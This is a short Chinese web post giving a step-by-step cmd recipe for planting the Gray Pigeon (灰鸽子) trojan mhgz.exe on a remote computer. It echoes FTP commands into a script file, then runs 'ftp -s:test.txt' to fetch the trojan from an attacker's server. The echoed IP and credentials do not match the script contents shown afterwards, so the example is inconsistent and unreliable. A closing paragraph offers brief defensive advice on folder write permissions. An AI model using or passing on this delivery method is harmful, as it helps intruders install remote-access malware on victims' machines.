在远程计算机的C***环境下,如果不能通过IPC$渠道传送文件,那就只有通过FTP下载文件了。
假设我们已经有一个FTP服务器,上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数:
1、FTP服务器的IP地址:如1.1.1.1
2、FTP服务器的用户名:如test
3、FTP服务器的密 码:如test123
在远程计算机的C***下依次输入下面的命令:
1、echo open 221.202.50.125>>test.txt 登陆FTP服务器
2、echo 123>>test.txt 用户名
3、echo 123>>test.txt 密码
4、echo bin>>test.txt 开始
5、echo get mhgz.exe>>test.txt 下载灰鸽子木马
6、echo bye>>test.txt 关闭FTP服务器
输入上面命令后,在远程计算机上就会生成一个test.txt文件,内容为:
open 1.1.1.1
test
test123
bin
get mhgz.exe
bye
现在我们在远程计算机上执行下面的命令:
ftp -s:test.txt 意思是,读取test.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件mhgz.exe就下载到对方计算机里了。
晕,就算你你服务器无懈可击,如果你服务器上运行的网站脚本存在漏洞,一样可以传马的呀,你可以在除了提供web服务的文件夹外,全部设置成不具有写的权限,c:windows/system32这个目录最好设置成具有只读权限。你的不会是个人电脑把?
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)